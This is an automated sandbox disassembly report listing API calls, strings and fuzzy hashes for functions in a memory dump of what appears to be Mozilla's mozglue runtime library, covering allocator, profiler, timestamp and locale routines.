Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: a587bef126b9a0bc5a310de1909375f17953702deec3efae8ac663c547fa6940
Instruction ID: 828c2a068095a41296b05bd92f71a6f3781519bce968bec21777f9496497eda7
Opcode Fuzzy Hash: a587bef126b9a0bc5a310de1909375f17953702deec3efae8ac663c547fa6940
Instruction Fuzzy Hash: FA61E432F04A068FCB08CB68C88976E77B5AF95318F694239E524B7A84D770E950CB91

Function 6C9548E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C99483A,?), ref: 6C954ACB
memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C99483A,?), ref: 6C954AE0
moz_xmalloc.MOZGLUE(FFFE15BF,?,6C99483A,?), ref: 6C954A82

Part of subcall function 6C96CA10: mozalloc_abort.MOZGLUE(?), ref: 6C96CAA2

memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C99483A,?), ref: 6C954A97
moz_xmalloc.MOZGLUE(15D4E801,?,6C99483A,?), ref: 6C954A35

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C99483A,?), ref: 6C954A4A
moz_xmalloc.MOZGLUE(15D4E824,?,6C99483A,?), ref: 6C954AF4
moz_xmalloc.MOZGLUE(FFFE15E2,?,6C99483A,?), ref: 6C954B10
moz_xmalloc.MOZGLUE(8E8E0022,?,6C99483A,?), ref: 6C954B2C

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID:
API String ID: 4251373892-0
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: c836c6404b59a98b96fd366800bf56677edf28e9e2258f747483ae3a99bfd716
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: 9E716AB19007469FCB94CF68C490AAAB7F5FF18308B504A3EE15A9BF41E731E565CB81

Function 6C9A9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9A8273), ref: 6C9A9D65
free.MOZGLUE(6C9A8273,?), ref: 6C9A9D7C
free.MOZGLUE(?,?), ref: 6C9A9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C9A9E0F
free.MOZGLUE(6C9A946B,?,?), ref: 6C9A9E24
free.MOZGLUE(?,?,?), ref: 6C9A9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C9A9EC8
free.MOZGLUE(6C9A946B,?,?,?), ref: 6C9A9EDF
free.MOZGLUE(?,?,?,?), ref: 6C9A9EF5

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: ea87678850254c977f1749df3b1565b7a4f658cbc270e975dbc3f1d92ae8ce37
Instruction ID: cc66e0434c47908e726fe05c1e405c7b9c056a102bd7088a109864a2d0e3a87c
Opcode Fuzzy Hash: ea87678850254c977f1749df3b1565b7a4f658cbc270e975dbc3f1d92ae8ce37
Instruction Fuzzy Hash: 6271C0B090AB419BD712CF58C48055BF3F4FFA9315B558619E84A5BB02EB31E8C6CB91

Function 6C9ADDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C9ADDCF

Part of subcall function 6C98FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C98FA4B

Part of subcall function 6C9A90E0: free.MOZGLUE(?,00000000,?,?,6C9ADEDB), ref: 6C9A90FF
Part of subcall function 6C9A90E0: free.MOZGLUE(?,00000000,?,?,6C9ADEDB), ref: 6C9A9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9ADE0D
free.MOZGLUE(00000000), ref: 6C9ADE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9ADE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9ADEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9ADEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C99DEFD,?,6C964A68), ref: 6C9ADF32

Part of subcall function 6C9ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9ADB86
Part of subcall function 6C9ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9ADC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C99DEFD,?,6C964A68), ref: 6C9ADF65
free.MOZGLUE(?), ref: 6C9ADF80

Part of subcall function 6C975E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C975EDB
Part of subcall function 6C975E90: memset.VCRUNTIME140(6C9B7765,000000E5,55CCCCCC), ref: 6C975F27
Part of subcall function 6C975E90: LeaveCriticalSection.KERNEL32(?), ref: 6C975FB2

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 02ac4593aad7038780de6ae4d8bb78bda0d6a179f01ddf464bcc15fa01e07d48
Instruction ID: 07a09c6d8a3f1bb89c0f9a03b58a6716fb9ee755bcb51460da20ac7cc5e3b0ad
Opcode Fuzzy Hash: 02ac4593aad7038780de6ae4d8bb78bda0d6a179f01ddf464bcc15fa01e07d48
Instruction Fuzzy Hash: E751C8736056119BD7219B98C8806AFB376BFA5308FA5051CDC5A63B00D731F95BCB92

Function 6C9B5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C9B5C8C,?,6C98E829), ref: 6C9B5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C9B5C8C,?,6C98E829), ref: 6C9B5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C9B5C8C,?,6C98E829), ref: 6C9B5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C9B5C8C,?,6C98E829), ref: 6C9B5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C9B5C8C,?,6C98E829), ref: 6C9B5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C9B5C8C,?,6C98E829), ref: 6C9B5DC9
std::_Facet_Register.LIBCPMT ref: 6C9B5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C9B5C8C,?,6C98E829), ref: 6C9B5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C9B5C8C,?,6C98E829), ref: 6C9B5E45

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 6cdb6995b18dd274a150c42f0f20349e94a623352bb42e798adf628be66697aa
Instruction ID: 986482af42913d889fa8551e66f2f1c07d4f3915cc1bd64038be01e92479de3a
Opcode Fuzzy Hash: 6cdb6995b18dd274a150c42f0f20349e94a623352bb42e798adf628be66697aa
Instruction Fuzzy Hash: 6441A270704304AFDB00DFA5C898AAE77BAEF9D314F144168E50AAB791DB30ED45CB61

Function 6C98CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C9531A7), ref: 6C98CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C98CFA4, 6C98CFB8
<jemalloc>, xrefs: 6C98CF9F, 6C98CFB3

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: d4d94462557eb4c16de0f024706ee42737e2311de7f3f47aa71b0c93b0f13eda
Instruction ID: 5a446591d9664db63465df0601bcf780b2761a0262ced7f2eb7ce6c0ce538875
Opcode Fuzzy Hash: d4d94462557eb4c16de0f024706ee42737e2311de7f3f47aa71b0c93b0f13eda
Instruction Fuzzy Hash: FB31A5317466055BFB00AFA98C45BAE7B79BB41B54F304A18F614FBA80DB70E8508BA1

Function 6C95ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C95F100: LoadLibraryW.KERNEL32(shell32,?,6C9CD020), ref: 6C95F122
Part of subcall function 6C95F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C95F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C95ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C95EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C95EDCC
CreateFileW.KERNEL32 ref: 6C95EE08
free.MOZGLUE(00000000), ref: 6C95EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C95EE32

Part of subcall function 6C95EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C95EBB5
Part of subcall function 6C95EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C98D7F3), ref: 6C95EBC3
Part of subcall function 6C95EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C98D7F3), ref: 6C95EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C95EDC1

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 82b52c9950e8b00268f52e43ebc1fca5abfa2a2c2ed291c31e56b6cce89361fc
Instruction ID: f8fcefda8028ca5365f535d4d4c7275449c6d16ec69aea3a88e6b11d8aaeb7d5
Opcode Fuzzy Hash: 82b52c9950e8b00268f52e43ebc1fca5abfa2a2c2ed291c31e56b6cce89361fc
Instruction Fuzzy Hash: 1E51E471E053048BDB01DF68D8446EEB7B4AF69318F84842DE85577780E736E998C7E2

Function 6C9CA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C9CA565

Part of subcall function 6C9CA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9CA4BE
Part of subcall function 6C9CA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C9CA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C9CA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C9CA6B6

Strings

z, xrefs: 6C9CA6AE
0, xrefs: 6C9CA5FB

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 63754fb347472aa17635b7d9c80de5ab71e51f668a522b9ecf7f57ce7d98b1fb
Instruction ID: 39c2075a9108b021f6ccd9e90dc490614a935261fe4c86eba3e5406684d4ba8f
Opcode Fuzzy Hash: 63754fb347472aa17635b7d9c80de5ab71e51f668a522b9ecf7f57ce7d98b1fb
Instruction Fuzzy Hash: E1411571A097459FC341DF28C480A9EBBE5BF99354F408A2EF49987650EB30E649CB83

Function 6C9578C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C9D008B), ref: 6C957B89
free.MOZGLUE(?,6C9D008B), ref: 6C957BAC

Part of subcall function 6C9578C0: free.MOZGLUE(?,6C9D008B), ref: 6C957BCF

free.MOZGLUE(?,6C9D008B), ref: 6C957BF2

Part of subcall function 6C975E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C975EDB
Part of subcall function 6C975E90: memset.VCRUNTIME140(6C9B7765,000000E5,55CCCCCC), ref: 6C975F27
Part of subcall function 6C975E90: LeaveCriticalSection.KERNEL32(?), ref: 6C975FB2

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: c97dce9f88387437935dbfea9f53d543657e2f8a2f1422a251793a417184a63e
Instruction ID: 5c69b13714031e60bac5e4748cd1f4d6f840b54876e96ee0871369d76e72af8e
Opcode Fuzzy Hash: c97dce9f88387437935dbfea9f53d543657e2f8a2f1422a251793a417184a63e
Instruction Fuzzy Hash: BFC1D571E111288BEB24CB28CC90BADB772AF51314F9583A9D41AABBC0C731DF958F51

Function 6C999420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C98AB89: EnterCriticalSection.KERNEL32(6C9DE370,?,?,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284), ref: 6C98AB94
Part of subcall function 6C98AB89: LeaveCriticalSection.KERNEL32(6C9DE370,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C98ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C964A68), ref: 6C99945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C999470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C999482
__Init_thread_footer.LIBCMT ref: 6C99949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C999459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C99947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C99946B

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 6b31bef862b1b3e34069b05751cd7b6a49fd42028fce8d7da1d07288b4c00fa5
Instruction ID: 0060e0053e48fd227103280c745b42c4851acb221d50019b609d9371d7c825ba
Opcode Fuzzy Hash: 6b31bef862b1b3e34069b05751cd7b6a49fd42028fce8d7da1d07288b4c00fa5
Instruction Fuzzy Hash: 24014C30A049008BDF009B5CD806A4933B99B4673EF1A8537DC0EA7B51D731F5E48957

Function 6C9A0F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C9A0F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9A0F88
GetCurrentThreadId.KERNEL32 ref: 6C9A0FF7
InitializeConditionVariable.KERNEL32(?), ref: 6C9A1067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C9A10A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C9A114B

Part of subcall function 6C998AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C9B1563), ref: 6C998BD5

free.MOZGLUE(?), ref: 6C9A1174
free.MOZGLUE(?), ref: 6C9A1186

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 462acd296da7f4db0e065d7a0398a44a1d8b4bfcb795dbb4eb983d3cab5ba282
Instruction ID: 648c00c2e434485eead290350164773a41767400858ae7ae70d9d001ba757811
Opcode Fuzzy Hash: 462acd296da7f4db0e065d7a0398a44a1d8b4bfcb795dbb4eb983d3cab5ba282
Instruction Fuzzy Hash: EB61C0756087409BDB10CF65C88079AB7F5BFE6308F14891DE88957711EB31E59ACB82

Function 6C95B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C95B61E,?,?,?,?,?,00000000), ref: 6C95B6AC

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C95B61E,?,?,?,?,?,00000000), ref: 6C95B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C95B61E,?,?,?,?,?,00000000), ref: 6C95B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C95B61E,?,?,?,?,?,00000000), ref: 6C95B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C95B61E,?,?,?,?,?,00000000), ref: 6C95B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C95B61E), ref: 6C95B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C95B61E,?,?,?,?,?,00000000), ref: 6C95B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C95B61E,?,?,?,?,?,00000000), ref: 6C95B79A

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: b50c49a22703ef48f9547e91819f0578a03f93acfd9323d28725a1d177805fb5
Instruction ID: b516a2354dfa021fb43a24e7c9b1a939dac2c0a3959cf5535051a4fa64861aff
Opcode Fuzzy Hash: b50c49a22703ef48f9547e91819f0578a03f93acfd9323d28725a1d177805fb5
Instruction Fuzzy Hash: A441B4B2D001159FCB04DF68DC905AEBBB9BF54324F650629E825E7B80E731E9148BE2

Function 6C95EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6C9D5104), ref: 6C95EFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C95EFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C95EFEC
free.MOZGLUE(?), ref: 6C95F00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C95F02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C95F041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C95F065
moz_xmalloc.MOZGLUE ref: 6C95F072

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: 31615140a69075855072b725a9caeefa3ca0091c5be611c9ca1adb42af21a160
Instruction ID: 146f2bb342db8a7aa6bd0efe71a3012a5e293157081bace1c5bacf8673975fb6
Opcode Fuzzy Hash: 31615140a69075855072b725a9caeefa3ca0091c5be611c9ca1adb42af21a160
Instruction Fuzzy Hash: 4C41D8B1A001059FCB08CF78D8809BE7769AF94328B240228E825D7794EB31E925C7E1

Function 6C9CB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C9CB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C9CB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C9CB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C9CB5F4
__Init_thread_footer.LIBCMT ref: 6C9CB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C9CB61F
std::_Facet_Register.LIBCPMT ref: 6C9CB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9CB655

Memory Dump Source

